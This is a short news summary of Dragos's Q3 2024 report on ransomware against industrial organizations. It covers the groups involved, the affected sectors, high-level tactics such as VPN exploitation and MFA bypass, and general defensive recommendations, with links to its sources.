Introduction
In the third quarter of 2024 [1], cybersecurity firm Dragos reported a significant rise in ransomware activities targeting industrial organizations. This surge involved 23 ransomware groups, including new and rebranded entities [4], and highlighted the evolving tactics used by cybercriminals to exploit vulnerabilities and evade detection.
Description
Cybersecurity firm Dragos has identified 23 ransomware groups that have impacted industrial organizations in Q3 2024 [2] [3], including new and rebranded entities such as Fog, Helldown [1] [2], RansomHub [1] [2] [4], and APT73, which is linked to remnants of LockBit affiliates and has introduced new payloads to evade detection [2]. This quarter saw a notable increase in ransomware activity, with significant incidents including CDK Global’s $25 million payment to BlackSuit and Halliburton’s $35 million loss to RansomHub [4], which specifically targeted sectors with low tolerance for downtime, such as healthcare [1] [2], financial services [1] [2], and manufacturing [1].
RansomHub [1] [2] [4], a Ransomware-as-a-Service (RaaS) operation [1] [4], claimed over 300 victims globally [1], aggressively focusing on critical sectors like energy, water management [1], transportation [1] [2], and manufacturing [1]. Fog ransomware exploited vulnerabilities in virtual environments, particularly VMware ESXi, while Helldown employed dual extortion techniques and credential harvesting [1]. Additionally, ransomware operators like Eldorado and Play shifted their tactics to target virtual networking applications [2], enhancing their capabilities to exploit vulnerabilities.
The exploitation of VPNs has risen significantly, with approximately 30% of incidents linked to such vulnerabilities [1], including notable issues like CVE-2024-40766 affecting SonicWall SSL VPNs. Ransomware groups have increasingly combined exploitation with credential-based attacks to bypass multi-factor authentication (MFA) [1] [2]. Advanced lateral movement techniques were also observed [1], with groups employing Living-Off-the-Land Techniques (LOLTs) and abusing remote access tools like AnyDesk to maintain persistence [1].
The manufacturing sector was the most affected [1], with 394 incidents accounting for 71% of all ransomware incidents [1]. Other impacted sectors included industrial control systems (ICS) equipment [1], engineering [1], transportation [1] [2], communications [1], and oil and natural gas [1]. The data revealed ransomware activity across 23 unique manufacturing subsectors [1], with construction [1], food and beverage [1], and machinery and equipment being the most targeted [1]. The rise of initial access brokers (IABs) within RaaS models has facilitated scalable operations [4], raising concerns about the potential impacts on critical infrastructure sectors [1]. The overall ransomware landscape in Q3 2024 demonstrated a significant increase in incidents compared to previous quarters [1], underscoring the urgent need for enhanced cybersecurity measures to protect against these evolving threats [1].
Conclusion
The increase in ransomware incidents during Q3 2024 underscores the critical need for robust cybersecurity strategies to protect vulnerable sectors. Organizations must prioritize the implementation of advanced security measures, such as regular vulnerability assessments, improved multi-factor authentication [1] [2] [4], and employee training to recognize phishing attempts. As ransomware tactics continue to evolve, collaboration between industries and cybersecurity experts will be essential to mitigate risks and safeguard critical infrastructure from future threats.
References
[1] https://www.manmonthly.com.au/dragos-industrial-ransomware-analysis-q3-2024/
[2] https://osintcorp.net/ransomware-attackers-target-industries-with-low-downtime-tolerance/
[3] https://www.infosecurity-magazine.com/news/ransomware-industries-downtime/
[4] https://thecyberwire.com/podcasts/daily-podcast/2214/transcript
